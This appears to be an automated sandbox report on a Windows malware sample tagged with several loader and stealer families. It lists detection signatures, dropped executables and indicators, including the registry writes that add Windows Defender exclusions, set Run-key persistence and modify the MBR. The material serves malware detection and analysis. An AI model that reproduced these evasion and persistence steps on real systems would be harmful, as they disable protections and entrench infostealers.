Malware Analysis Report

2024-11-30 04:46

Sample ID 240222-g2y62sdc6x
Target d874c5f6b10e26cfd96af59be1a40b173d0614770703a36fb84dd855900fd78c.exe
SHA256 d874c5f6b10e26cfd96af59be1a40b173d0614770703a36fb84dd855900fd78c
Tags
dcrat glupteba smokeloader socks5systemz stealc pub1 backdoor bootkit botnet discovery dropper evasion infostealer loader persistence rat spyware stealer trojan upx lumma
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

d874c5f6b10e26cfd96af59be1a40b173d0614770703a36fb84dd855900fd78c

Threat Level: Known bad

The file d874c5f6b10e26cfd96af59be1a40b173d0614770703a36fb84dd855900fd78c.exe was found to be: Known bad.

Malicious Activity Summary

dcrat glupteba smokeloader socks5systemz stealc pub1 backdoor bootkit botnet discovery dropper evasion infostealer loader persistence rat spyware stealer trojan upx lumma

Glupteba

SmokeLoader

Glupteba payload

Socks5Systemz

Windows security bypass

Stealc

Lumma Stealer

Detect Socks5Systemz Payload

DcRat

Detects executables referencing many varying, potentially fake Windows User-Agents

Detects executables Discord URL observed in first stage droppers

Detect binaries embedding considerable number of MFA browser extension IDs.

Detects Windows executables referencing non-Windows User-Agents

Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers.

Detects executables containing URLs to raw contents of a Github gist

Detect binaries embedding considerable number of cryptocurrency wallet browser extension IDs.

UPX dump on OEP (original entry point)

Detects executables packed with VMProtect.

Detects executables containing artifacts associated with disabling Widnows Defender

Modifies Windows Firewall

Creates new service(s)

Downloads MZ/PE file

Stops running service(s)

Loads dropped DLL

UPX packed file

Windows security modification

Deletes itself

Executes dropped EXE

Reads data files stored by FTP clients

Checks computer location settings

Reads user/profile data of web browsers

Checks installed software on the system

Legitimate hosting services abused for malware hosting/C2

Writes to the Master Boot Record (MBR)

Adds Run key to start application

Accesses cryptocurrency files/wallets, possible credential harvesting

Drops file in System32 directory

Suspicious use of SetThreadContext

Checks for VirtualBox DLLs, possible anti-VM trick

Launches sc.exe

Drops file in Windows directory

Unsigned PE

Enumerates physical storage devices

Program crash

Modifies system certificate store

Suspicious behavior: MapViewOfSection

Suspicious behavior: LoadsDriver

Suspicious use of SetWindowsHookEx

Suspicious use of FindShellTrayWindow

Checks processor information in registry

Suspicious use of WriteProcessMemory

Uses Task Scheduler COM API

Suspicious use of AdjustPrivilegeToken

Checks SCSI registry key(s)

Suspicious behavior: EnumeratesProcesses

Creates scheduled task(s)

Modifies data under HKEY_USERS

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-02-22 06:18

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-02-22 06:18

Reported

2024-02-22 06:21

Platform

win7-20240221-en

Max time kernel

150s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\d874c5f6b10e26cfd96af59be1a40b173d0614770703a36fb84dd855900fd78c.exe"

Signatures

DcRat

rat infostealer dcrat
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\d874c5f6b10e26cfd96af59be1a40b173d0614770703a36fb84dd855900fd78c.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\CSRSS = "\"C:\\ProgramData\\Drivers\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\E90C.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Detect Socks5Systemz Payload

Description Indicator Process Target
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Socks5Systemz

botnet socks5systemz

Stealc

stealer stealc

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\288c47bbc1871b439df19ff4df68f076.exe = "0" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A

Detect binaries embedding considerable number of MFA browser extension IDs.

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect binaries embedding considerable number of cryptocurrency wallet browser extension IDs.

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects Windows executables referencing non-Windows User-Agents

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers.

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects executables Discord URL observed in first stage droppers

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects executables containing URLs to raw contents of a Github gist

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects executables containing artifacts associated with disabling Widnows Defender

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects executables packed with VMProtect.

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects executables referencing many varying, potentially fake Windows User-Agents

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

UPX dump on OEP (original entry point)

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Creates new service(s)

persistence

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Deletes itself

Description Indicator Process Target
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\BFC7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\D339.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\E2E3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-A10UD.tmp\E2E3.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\E90C.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\E90C.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\DVD32 Plug-in\dvd32plugin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\F250.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\DVD32 Plug-in\dvd32plugin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\cbujigs N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\911F.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A220.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B276.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VPPLH.tmp\B276.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FourthX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsjF105.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\E2E3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-A10UD.tmp\E2E3.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-A10UD.tmp\E2E3.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-A10UD.tmp\E2E3.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\E90C.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\E90C.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-A10UD.tmp\E2E3.tmp N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B276.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\911F.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\911F.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VPPLH.tmp\B276.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VPPLH.tmp\B276.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VPPLH.tmp\B276.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VPPLH.tmp\B276.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\911F.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\911F.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\911F.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsjF105.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsjF105.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\288c47bbc1871b439df19ff4df68f076.exe = "0" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\CSRSS = "\"C:\\ProgramData\\Drivers\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\E90C.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PHYSICALDRIVE0 C:\Users\Admin\AppData\Local\Temp\BFC7.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\MRT.exe C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\MRT.exe C:\Users\Admin\AppData\Local\Temp\FourthX.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2640 set thread context of 1224 N/A C:\Users\Admin\AppData\Local\Temp\E90C.exe C:\Users\Admin\AppData\Local\Temp\E90C.exe
PID 2068 set thread context of 1368 N/A C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe C:\Windows\system32\conhost.exe
PID 2068 set thread context of 2800 N/A C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe C:\Windows\explorer.exe

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\wusa.lock C:\Windows\system32\wusa.exe N/A
File created C:\Windows\Logs\CBS\CbsPersist_20240222062035.cab C:\Windows\system32\makecab.exe N/A
File created C:\Windows\wusa.lock C:\Windows\system32\wusa.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\D339.exe

Checks SCSI registry key(s)

Description Indicator Process Target
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\cbujigs N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\d874c5f6b10e26cfd96af59be1a40b173d0614770703a36fb84dd855900fd78c.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\d874c5f6b10e26cfd96af59be1a40b173d0614770703a36fb84dd855900fd78c.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\d874c5f6b10e26cfd96af59be1a40b173d0614770703a36fb84dd855900fd78c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\cbujigs N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\cbujigs N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\nsjF105.tmp N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\nsjF105.tmp N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace\Session C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-421 = "Russian Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-102 = "Microsoft Corporation" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-471 = "Ekaterinburg Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-552 = "North Asia Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-151 = "Central America Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-103 = "Microsoft Corporation" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
